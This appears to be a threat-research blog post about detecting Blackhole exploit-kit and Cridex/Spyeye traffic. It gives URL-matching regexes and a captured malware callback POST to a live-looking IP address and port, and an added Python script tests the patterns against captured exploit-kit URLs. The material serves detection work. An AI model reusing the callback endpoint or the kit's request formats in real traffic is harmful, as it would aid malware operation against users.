I believe there is a good enough pattern for url regex here, once pre-qualified for user agent java or no referrer or both. 

Generic detection: \.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w


Callback

This particular sample had a Cridex-like rootkit callout with what looked like a Spyeye sample. On the disk, the file names (again) were wgsdgsdgdsgsd.exe as well as a KB<randomnumber>.exe.


POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
Content-Length: 350
Connection: Keep-Alive
Cache-Control: no-cache


Generic Detection: \w{2}\/\w.*\/in\/$

This user agent is identified in multiple malware samples as post infection activity and the URL string is consistent with Cridex rootkit, while the malware sample was consistent with Spyeye.
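As an added example (not code from the posts), the following Python runs the three URL regexes from this series, the generic detection above, the tightened BHEK 2.0 pattern from the October 14 post and the binary get request pattern from the Blackhole 2.0 PDF post, over the three stage URLs captured in this post, and reports which pattern catches which stage. It also checks the first-parameter hex length observation and the /in/ callback path pattern. The benign URL is constructed.

```python
"""Classify captured exploit-kit request URLs against the URL patterns quoted
in this series. Added example, not code from the posts; the benign URL is
constructed, the other URLs are the ones captured in this post."""
import re
from urllib.parse import parse_qsl, urlsplit

PATTERNS = {
    # generic detection quoted in this post: 10 to 70 hex characters first
    "generic": re.compile(
        r"\.php\?\w{2,10}=[0-9a-f]{10,70}&\w{2,10}=\w.*&\w{2,10}=\w"),
    # tightened BHEK 2.0 pattern from the October 14 post
    "bhek2_tight": re.compile(
        r"\.php\?\w{2,10}=[0-9a-f]{10}&\w{2,10}=[a-z0-9]{2,6}"
        r"&[a-z]{2,8}=[a-z]{2,10}&[a-z]{2,8}=[a-z]{2,8}$"),
    # binary get request pattern from the Blackhole 2.0 PDF post
    "binary_get": re.compile(
        r"\.php\?\w\w=[a-f0-9]{10}&\w\w=[a-f0-9]{20}&\w=[0-9]{2}&\w\w=\w&\w\w=\w$"),
}
# post-infection callback path pattern quoted in this post
CALLBACK_PATH = re.compile(r"\w{2}/\w.*/in/$")
HEX = re.compile(r"^[0-9a-f]+$")

SAMPLE_URLS = {
    "jar": "/forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx",
    "pdf": "/forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002",
    "binary": "/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m",
    "benign": "/index.php?page=about&id=10",  # constructed, not from a capture
}


def classify(url):
    """Names of the patterns that match the request URL, sorted."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(url))


def first_param_hex_len(url):
    """Length of the first query value when it is pure hex, else 0."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if not pairs or not HEX.match(pairs[0][1]):
        return 0
    return len(pairs[0][1])


def first_param_in_tens(url):
    """True when the first query value is hex with a length that is a multiple of 10."""
    n = first_param_hex_len(url)
    return n > 0 and n % 10 == 0


def is_callback_path(path):
    """True when a request path matches the /in/ callback pattern above."""
    return CALLBACK_PATH.search(path) is not None


if __name__ == "__main__":
    for stage, url in SAMPLE_URLS.items():
        print(stage, classify(url), first_param_hex_len(url), first_param_in_tens(url))
    print(is_callback_path("/mx/5/A/in/"))
```

Run as written, the generic pattern matches all three captured stages, the tightened pattern matches only the jar request and the binary get pattern only the binary request, which is why the post above pre-qualifies on user agent or missing Referer before applying the looser regex.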


References:
http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html
http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/
http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/
http://www.spamhaus.org/news/article/680/
http://stopmalvertising.com/rootkits/analysis-of-cridex.html
http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html
http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html
http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze
http://blog.fireeye.com/research/2010/06/neosploit_notes.html
http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js
http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5